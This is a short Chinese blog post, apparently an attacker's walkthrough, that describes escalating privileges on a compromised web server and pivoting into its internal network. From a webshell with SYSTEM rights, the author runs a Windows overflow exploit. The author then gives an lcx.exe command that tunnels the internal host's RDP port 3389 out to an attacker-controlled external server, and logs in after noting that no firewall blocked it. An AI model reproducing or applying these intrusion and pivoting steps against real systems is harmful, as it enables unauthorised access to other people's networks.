局域网提权实战转发科普篇
局域网提权实战转发科普篇 作者:0x80
mysql 版本有点高了,最要命的是,不支持ASP,PHP,ASPX, 脚本执行全部被禁
不能通过网页访问脚本
一般管理员不会注意,system32/cmd.exe
有权限可执行,这下还有点希望了,先来看看用户
D:\site\noso\include\taglib\> whoami
nt authority\system
系统权限,看下IP
其实系统权限可以直接提权
局域网, 这下肯定需要转发了
先上个MS看看
溢出成功了
简单是秒杀了,这时候我这边也是内网,不能转发,我需要借助
一台服务器,这时候需要在那上面去转发
首先还是监听51,33891
接着,菜刀下执行这段代码
D:\site\noso\lcx.exe -slave 外网服务器IP 51 10.2.10.90 3389
外网服务器连接 127.0.0.1:33891 ,输入提权后的帐号
成功提权进入内网。
再注销内网,看看LCX的连接情况,很顺利,没有防火墙拦截
<< 上一篇
下一篇 >>